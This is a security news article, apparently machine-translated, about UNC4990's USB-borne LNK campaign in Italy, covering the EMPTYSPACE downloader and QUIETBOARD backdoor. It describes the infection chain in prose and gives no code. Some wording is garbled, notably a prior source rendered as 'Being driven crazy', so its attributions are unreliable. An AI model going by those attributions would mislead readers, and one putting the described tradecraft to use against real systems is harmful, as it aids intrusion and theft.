Italian Companies Hit by Weaponized USBs Spreading Cryptojacking Malware

Cryptojacking Malware

A financially motivated threat actor known as UNC4990 uses weaponized USB devices as an initial infection vector to target organizations in Italy.

Google-owned Mandiant said the attacks affected multiple sectors, including healthcare, transportation, construction and logistics.

“UNC4990 operations typically involve a widespread USB infection followed by deployment of the EMPTYSPACE downloader,” the company says. said in a Tuesday report.

“During these operations, the cluster relies on third-party websites, such as GitHub, Vimeo, and Ars Technica, to host encrypted additional stages, which it downloads and decrypts via PowerShell early in the execution chain.”

UNC4990, active since late 2020, is believed to operate from Italy based on the extensive use of Italian infrastructure for command and control purposes (C2).

It is currently unknown whether UNC4990 functions solely as an initial access facilitator for other actors. The threat actor’s end goal is also unclear, although in one case an open-source cryptocurrency miner is said to have been deployed after months of beacon activity.

Details of the campaign have been previously documented by Being driven crazy And Yoroi in early December 2023, with the first following the opponent under the name Nebula Broker.

The infection starts when a victim double-clicks on a malicious LNK shortcut file on a removable USB device, leading to the execution of a PowerShell script responsible for downloading EMPTYSPACE (also known as BrokerLoader or Vetta Loader) from a third party server via another intermedia PowerShell script hosted on Vimeo.

Cryptojacking malware

Yoroi said it has identified four different variants of EMPTYSPACE, written in Golang, .NET, Node.js and Python, which then act as a conduit for retrieving next-stage payloads via HTTP from the C2 server, including a backdoor called QUIET BOARD.

A notable aspect of this phase is the use of popular sites such as Ars Technica, GitHub, GitLab and Vimeo to host the malicious payload.

“The content hosted on these services posed no immediate risk to everyday users of these services because the content hosted separately was completely benign,” Mandiant researchers said. “Anyone who accidentally clicked on or viewed this content in the past was not at risk of being hacked.”

QUIETBOARD, on the other hand, is a Python-based backdoor with a wide range of features that allow it to execute arbitrary commands, modify crypto wallet addresses copied to the clipboard to redirect fund transfers to wallets under their control, and the malware can distribute to removable drives, take screenshots and collect system information.

Furthermore, the backdoor is capable of modular expansion and running independent Python modules such as coin miners, as well as dynamically retrieving and executing Python code from the C2 server.

“The analysis of both EMPTYSPACE and QUIETBOARD suggests how the threat actors took a modular approach to developing their toolset,” Mandiant said.

“The use of multiple programming languages ​​to create different versions of the EMPTYSPACE downloader and the URL change when the Vimeo video was removed show a propensity for experimentation and adaptability on the part of the threat actors.”

#Italian #Companies #Hit #Weaponized #USBs #Spreading #Cryptojacking #Malware

Notify of
Inline Feedbacks
View all comments
Previous Post
Chinese Hackers

Hackers exploit Ivanti VPN flaws to deploy KrustyLoader malware

Next Post
SaaS Cybersecurity Rules

Understanding new SaaS cybersecurity rules

Related Posts